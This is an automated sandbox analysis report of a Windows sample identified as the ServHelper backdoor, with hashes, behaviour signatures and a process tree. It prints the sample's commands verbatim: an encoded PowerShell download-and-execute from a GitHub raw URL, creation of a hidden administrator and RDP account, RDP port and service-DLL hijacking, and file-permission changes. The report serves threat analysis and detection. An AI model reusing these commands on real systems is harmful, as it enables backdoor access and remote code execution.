Analysis
-
max time kernel
133s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
10-04-2024 14:32
Behavioral task
behavioral1
Sample
e04abdb57ce06940bdbac3b5c6a99a7e52e6c315dd97e3da045d570871e7900b.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
e04abdb57ce06940bdbac3b5c6a99a7e52e6c315dd97e3da045d570871e7900b.exe
Resource
win10v2004-20240226-en
General
-
Target
e04abdb57ce06940bdbac3b5c6a99a7e52e6c315dd97e3da045d570871e7900b.exe
-
Size
6.8MB
-
MD5
fc239dd2dc52a4853c7be50c86367f7b
-
SHA1
f6c01c5da3f62a97f6d4427b626d366ad898d3b3
-
SHA256
e04abdb57ce06940bdbac3b5c6a99a7e52e6c315dd97e3da045d570871e7900b
-
SHA512
4acd84c438e018bdf223561c54b19a6e05b792a5a5bc73d40e5ae4500f3cb9f3ac8e53484b539d49375e4d14341ea1bc45f00223933a4b5f7b251110be3a0458
-
SSDEEP
196608:DkDzNZ1Ja0TTLmxoQT7RRq4ujlV9450cS:DkDRTPTTStLq4ujw
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Signatures
-
ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid process 5 1048 powershell.exe 6 1048 powershell.exe -
Modifies RDP port number used by Windows 1 TTPs
-
Possible privilege escalation attempt 8 IoCs
Processes:
icacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exetakeown.exepid process 528 icacls.exe 1512 icacls.exe 2588 icacls.exe 2152 icacls.exe 924 icacls.exe 2104 icacls.exe 3032 icacls.exe 532 takeown.exe -
Sets DLL path for service in the registry 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\TermService\Parameters\ServiceDLL = "C:\\Windows\\branding\\mediasrv.png" reg.exe -
Loads dropped DLL 2 IoCs
Processes:
pid process 1044 1044 -
Modifies file permissions 1 TTPs 8 IoCs
Processes:
takeown.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exepid process 532 takeown.exe 528 icacls.exe 1512 icacls.exe 2588 icacls.exe 2152 icacls.exe 924 icacls.exe 2104 icacls.exe 3032 icacls.exe -
Processes:
resource yara_rule \Windows\Branding\mediasrv.png upx \Windows\Branding\mediasvc.png upx -
Processes:
resource yara_rule behavioral1/memory/2344-0-0x00000000012A0000-0x00000000020E6000-memory.dmp vmprotect -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
Processes:
flow ioc 5 raw.githubusercontent.com 6 raw.githubusercontent.com 4 raw.githubusercontent.com -
Drops file in System32 directory 1 IoCs
Processes:
powershell.exedescription ioc process File created C:\Windows\system32\rfxvmt.dll powershell.exe -
Drops file in Windows directory 9 IoCs
Processes:
powershell.exepowershell.exedescription ioc process File opened for modification C:\Windows\branding\Basebrd powershell.exe File opened for modification C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\X8Z2KGG9GDV3UE8HUV2I.temp powershell.exe File created C:\Windows\branding\mediasrv.png powershell.exe File created C:\Windows\branding\mediasvc.png powershell.exe File created C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\branding\ShellBrd powershell.exe File opened for modification C:\Windows\branding\mediasvc.png powershell.exe -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
-
Modifies data under HKEY_USERS 4 IoCs
Processes:
powershell.exeWMIC.exeWMIC.exedescription ioc process Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = d083bbfd538bda01 powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 8 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 2560 powershell.exe 2320 powershell.exe 1848 powershell.exe 1928 powershell.exe 2560 powershell.exe 2560 powershell.exe 2560 powershell.exe 1048 powershell.exe -
Suspicious behavior: LoadsDriver 5 IoCs
Processes:
pid process 468 1044 1044 1044 1044 -
Suspicious use of AdjustPrivilegeToken 18 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exeicacls.exeWMIC.exeWMIC.exepowershell.exedescription pid process Token: SeDebugPrivilege 2560 powershell.exe Token: SeDebugPrivilege 2320 powershell.exe Token: SeDebugPrivilege 1848 powershell.exe Token: SeDebugPrivilege 1928 powershell.exe Token: SeRestorePrivilege 1512 icacls.exe Token: SeAssignPrimaryTokenPrivilege 2684 WMIC.exe Token: SeIncreaseQuotaPrivilege 2684 WMIC.exe Token: SeAuditPrivilege 2684 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 2684 WMIC.exe Token: SeIncreaseQuotaPrivilege 2684 WMIC.exe Token: SeAuditPrivilege 2684 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 2412 WMIC.exe Token: SeIncreaseQuotaPrivilege 2412 WMIC.exe Token: SeAuditPrivilege 2412 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 2412 WMIC.exe Token: SeIncreaseQuotaPrivilege 2412 WMIC.exe Token: SeAuditPrivilege 2412 WMIC.exe Token: SeDebugPrivilege 1048 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
e04abdb57ce06940bdbac3b5c6a99a7e52e6c315dd97e3da045d570871e7900b.exepowershell.execsc.exenet.execmd.execmd.exedescription pid process target process PID 2344 wrote to memory of 2560 2344 e04abdb57ce06940bdbac3b5c6a99a7e52e6c315dd97e3da045d570871e7900b.exe powershell.exe PID 2344 wrote to memory of 2560 2344 e04abdb57ce06940bdbac3b5c6a99a7e52e6c315dd97e3da045d570871e7900b.exe powershell.exe PID 2344 wrote to memory of 2560 2344 e04abdb57ce06940bdbac3b5c6a99a7e52e6c315dd97e3da045d570871e7900b.exe powershell.exe PID 2560 wrote to memory of 2436 2560 powershell.exe csc.exe PID 2560 wrote to memory of 2436 2560 powershell.exe csc.exe PID 2560 wrote to memory of 2436 2560 powershell.exe csc.exe PID 2436 wrote to memory of 2348 2436 csc.exe cvtres.exe PID 2436 wrote to memory of 2348 2436 csc.exe cvtres.exe PID 2436 wrote to memory of 2348 2436 csc.exe cvtres.exe PID 2560 wrote to memory of 2320 2560 powershell.exe powershell.exe PID 2560 wrote to memory of 2320 2560 powershell.exe powershell.exe PID 2560 wrote to memory of 2320 2560 powershell.exe powershell.exe PID 2560 wrote to memory of 1848 2560 powershell.exe powershell.exe PID 2560 wrote to memory of 1848 2560 powershell.exe powershell.exe PID 2560 wrote to memory of 1848 2560 powershell.exe powershell.exe PID 2560 wrote to memory of 1928 2560 powershell.exe powershell.exe PID 2560 wrote to memory of 1928 2560 powershell.exe powershell.exe PID 2560 wrote to memory of 1928 2560 powershell.exe powershell.exe PID 2560 wrote to memory of 532 2560 powershell.exe takeown.exe PID 2560 wrote to memory of 532 2560 powershell.exe takeown.exe PID 2560 wrote to memory of 532 2560 powershell.exe takeown.exe PID 2560 wrote to memory of 528 2560 powershell.exe icacls.exe PID 2560 wrote to memory of 528 2560 powershell.exe icacls.exe PID 2560 wrote to memory of 528 2560 powershell.exe icacls.exe PID 2560 wrote to memory of 1512 2560 powershell.exe icacls.exe PID 2560 wrote to memory of 1512 2560 powershell.exe icacls.exe PID 2560 wrote to memory of 1512 2560 powershell.exe icacls.exe PID 2560 wrote to memory of 2588 2560 powershell.exe icacls.exe PID 2560 wrote to memory of 2588 2560 powershell.exe icacls.exe PID 2560 wrote to memory of 2588 2560 powershell.exe icacls.exe PID 2560 wrote to memory of 2152 2560 powershell.exe icacls.exe PID 2560 wrote to memory of 2152 2560 powershell.exe icacls.exe PID 2560 wrote to memory of 2152 2560 powershell.exe icacls.exe PID 2560 wrote to memory of 924 2560 powershell.exe icacls.exe PID 2560 wrote to memory of 924 2560 powershell.exe icacls.exe PID 2560 wrote to memory of 924 2560 powershell.exe icacls.exe PID 2560 wrote to memory of 2104 2560 powershell.exe icacls.exe PID 2560 wrote to memory of 2104 2560 powershell.exe icacls.exe PID 2560 wrote to memory of 2104 2560 powershell.exe icacls.exe PID 2560 wrote to memory of 3032 2560 powershell.exe icacls.exe PID 2560 wrote to memory of 3032 2560 powershell.exe icacls.exe PID 2560 wrote to memory of 3032 2560 powershell.exe icacls.exe PID 2560 wrote to memory of 2188 2560 powershell.exe reg.exe PID 2560 wrote to memory of 2188 2560 powershell.exe reg.exe PID 2560 wrote to memory of 2188 2560 powershell.exe reg.exe PID 2560 wrote to memory of 2292 2560 powershell.exe reg.exe PID 2560 wrote to memory of 2292 2560 powershell.exe reg.exe PID 2560 wrote to memory of 2292 2560 powershell.exe reg.exe PID 2560 wrote to memory of 2256 2560 powershell.exe reg.exe PID 2560 wrote to memory of 2256 2560 powershell.exe reg.exe PID 2560 wrote to memory of 2256 2560 powershell.exe reg.exe PID 2560 wrote to memory of 2148 2560 powershell.exe net.exe PID 2560 wrote to memory of 2148 2560 powershell.exe net.exe PID 2560 wrote to memory of 2148 2560 powershell.exe net.exe PID 2148 wrote to memory of 944 2148 net.exe net1.exe PID 2148 wrote to memory of 944 2148 net.exe net1.exe PID 2148 wrote to memory of 944 2148 net.exe net1.exe PID 2560 wrote to memory of 1756 2560 powershell.exe cmd.exe PID 2560 wrote to memory of 1756 2560 powershell.exe cmd.exe PID 2560 wrote to memory of 1756 2560 powershell.exe cmd.exe PID 1756 wrote to memory of 968 1756 cmd.exe cmd.exe PID 1756 wrote to memory of 968 1756 cmd.exe cmd.exe PID 1756 wrote to memory of 968 1756 cmd.exe cmd.exe PID 968 wrote to memory of 2328 968 cmd.exe net.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\e04abdb57ce06940bdbac3b5c6a99a7e52e6c315dd97e3da045d570871e7900b.exe"C:\Users\Admin\AppData\Local\Temp\e04abdb57ce06940bdbac3b5c6a99a7e52e6c315dd97e3da045d570871e7900b.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2344 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'2⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2560 -
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\yma1bx4f.cmdline"3⤵
- Suspicious use of WriteProcessMemory
PID:2436 -
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA96A.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCA969.tmp"4⤵PID:2348
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2320
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1848
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1928
-
-
C:\Windows\system32\takeown.exe"C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:532
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:528
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1512
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2588
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2152
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:924
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2104
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3032
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵PID:2188
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Sets DLL path for service in the registry
- Modifies registry key
PID:2292
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵PID:2256
-
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵
- Suspicious use of WriteProcessMemory
PID:2148 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵PID:944
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵
- Suspicious use of WriteProcessMemory
PID:1756 -
C:\Windows\system32\cmd.execmd /c net start rdpdr4⤵
- Suspicious use of WriteProcessMemory
PID:968 -
C:\Windows\system32\net.exenet start rdpdr5⤵PID:2328
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start rdpdr6⤵PID:2792
-
-
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵PID:2036
-
C:\Windows\system32\cmd.execmd /c net start TermService4⤵PID:1504
-
C:\Windows\system32\net.exenet start TermService5⤵PID:892
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start TermService6⤵PID:876
-
-
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f3⤵PID:840
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f3⤵PID:2376
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc Ghasar4f5 /del1⤵PID:1668
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc Ghasar4f5 /del2⤵PID:2892
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc Ghasar4f5 /del3⤵PID:1816
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc FNIAHPgt /add1⤵PID:2908
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc FNIAHPgt /add2⤵PID:2824
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc FNIAHPgt /add3⤵PID:1744
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD1⤵PID:2652
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD2⤵PID:872
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD3⤵PID:1492
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" KXIPPCKF$ /ADD1⤵PID:2832
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" KXIPPCKF$ /ADD2⤵PID:1588
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" KXIPPCKF$ /ADD3⤵PID:1596
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD1⤵PID:1592
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD2⤵PID:2596
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD3⤵PID:2924
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc FNIAHPgt1⤵PID:1860
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc FNIAHPgt2⤵PID:2012
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc FNIAHPgt3⤵PID:1320
-
-
-
C:\Windows\System32\cmd.execmd.exe /C wmic path win32_VideoController get name1⤵PID:2708
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name2⤵
- Detects videocard installed
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2684
-
-
C:\Windows\System32\cmd.execmd.exe /C wmic CPU get NAME1⤵PID:2408
-
C:\Windows\System32\Wbem\WMIC.exewmic CPU get NAME2⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2412
-
-
C:\Windows\System32\cmd.execmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA1⤵PID:2480
-
C:\Windows\system32\cmd.execmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA2⤵PID:1444
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA3⤵
- Blocklisted process makes network request
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1048
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5930c8ee072b5c0763be255b9179f60cb
SHA1e8214123b02c9cf580e4871d9e8e59ed92d73c96
SHA2563706f50dc53c2dd78807105d2a3611169b93d57b621ddbcae4203ade13125ce1
SHA5126b4019ba984c9a03dbddae82cebdb144a8666036dae2c709d5e8d0cbddf935e11aa3ec08a136f74abec6b10ea6af8a6d720c0ab1d98bc425dbe3e3989b303aa1
-
Filesize
2.5MB
MD55db5ffa607b5b5ca17bfd6fb78403660
SHA11e793958cb1dd1dc99da4a50beaa2945561b7a16
SHA2561fa24f444e6b18ab2072201a5d9de4df325830990f073194addb5327137c2e89
SHA5123d2eab2b02c1d7302b563e3cc232791e242c8d2686a0a4cb58115cdd4ca19f48e390791404f62fef2c0fdbe3e5185b260de6a8fd5ccef2e091d473e0186ffe43
-
Filesize
1KB
MD528d9755addec05c0b24cca50dfe3a92b
SHA17d3156f11c7a7fb60d29809caf93101de2681aa3
SHA256abb6ceb444b3dc29fcdcb8bda4935a6a792b85bb7049cb2710d97415d9411af9
SHA512891a72eeef42be3f04067225a9665020704c99f9c17473ca57e5b946dfa35cb469fa91a794ea30115ce3ed0e940edb3ccff69a16a888379f5ac46a12afaa4c42
-
Filesize
3KB
MD5f0989b0a7354b92a93e2e1314ed48cc1
SHA169ecd38816731409672a31c1d95ed36cd2ecab30
SHA2566e216abae842d5b077a0aa9755e14d98e9cb6e1f8f412f061b8b89a1ca8c2782
SHA51294eccb3002234e6fb8c80b1ce063dfecdc0715c85b3ce7d5a5d44a8fc29c1f6090e3da8918c80af3d0a428f2b3db22a2b0448cc4d6208eff61ab34e5343c4194
-
Filesize
7KB
MD5d712ecff726561e265ecf9c7cb2b1372
SHA119cb8ff00d024ca1d0145af0f160e9522a38354a
SHA2560de3eb77538fd8c3c657dfea3a371d0527e6fd7e4928068d2ae8fd4f32f4f9f0
SHA51247a71a0fe1b3fe159dfd151870608718089176ebd9ff773b3eb62afc997cca725140b8ef48d3a433f94f373a820177b1acdd18aa7f1f46f3225afe810d7b949c
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5ea42d885cbf3e251d18a8ffc5a2e2f99
SHA17f51842597337b80cca8571e6930f06ddefeffff
SHA25661c8262c01afa54d49306fc327a83636e473a7921d8ac9eb8bcc6d1b75517463
SHA5121b3143bd119bdf7a1ec454bbdc8e00e52aa9b78e4503b63cb6d776379a64d0d73caf1c60fb193b185e39c1a5ad63d08ed4312dc430c31ec4caae50d8d5d041f1
-
Filesize
40KB
MD5dc39d23e4c0e681fad7a3e1342a2843c
SHA158fd7d50c2dca464a128f5e0435d6f0515e62073
SHA2566d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9
SHA5125cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7
-
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
Filesize
652B
MD5b6d1a68f8effa08bced358900b60bfb6
SHA17b3537ee61cf278e4bf9e993448fd9ba5b4d86ff
SHA256967e33aff19f346de1dae91fb3a9fffbd22263dec866ff79bd9b28fce56d1666
SHA5123df7b8c3ee2b82c8a2e3482ef782451931b0d38c626ca53929fcad88b56d53b08186fc216cc79f0b4956e62ba54cf7449dbdc0df2dc2a9cff605fb7d6988a520
-
Filesize
424B
MD59f8ab7eb0ab21443a2fe06dab341510e
SHA12b88b3116a79e48bab7114e18c9b9674e8a52165
SHA256e1a4fbe36125e02e100e729ce92ab74869423da87cb46da6e3c50d7c4410b2d9
SHA51253f5dc4c853af5a412fde895635ef4b2de98a165e3546130fdd17a37a5c3b177e21eccf70a5ddf936ac491da2d7e8fcdbc1e564a95ec01b097841aa78869989b
-
Filesize
309B
MD572b005d46d7a2538e31bb13d2bbd9de3
SHA126ffd2a3fdebe87f352721f7a1f7b703503cd449
SHA2562ab7c0c9042a24d4fd53b677c6eac91f4bdb703430e0848798c83497d3158630
SHA512c799af9c783e160d1175a6b0cd3b0a30f0da6e35038799fa933bc2aabc9a4cf394c0aad4af32a7533e980f40ac20a41190305d9e941826bf5dfca581050b7774
-
Filesize
60KB
MD596e498a3833f52ae46bcfdc391f73cf7
SHA1ecaf72b46cf1cb074bde2914963bb1e61450ca95
SHA25621a0a297e9a2295f7e32aea08ea74c01199cc57d30b8a177fa99c9cc96a6268b
SHA5129f273a77d434807138c884cc95deb1cadea1ff6db492839d238759a265f3b0ded318b6af59d0743f8dd1555e968afb1eca9ba92a214ecd247480d2a072c08540
-
Filesize
743KB
MD52ee3d03bb1f8bd257235fc70e92b17e1
SHA1c36482b8f8229578dec1cc687aaf53084cb6d05e
SHA256b7a9b4269995093c63efe64cb65e4562680af2fdf7c4dfdc235f2eb60c469ff0
SHA51239f8a42a512e4bfbf84ac3c472bf9444a139da23b7007f57aa68dc9ba9db5466b7f155df18c0a49e3073527763ef459180ab1912e53453d312c17718ab67abea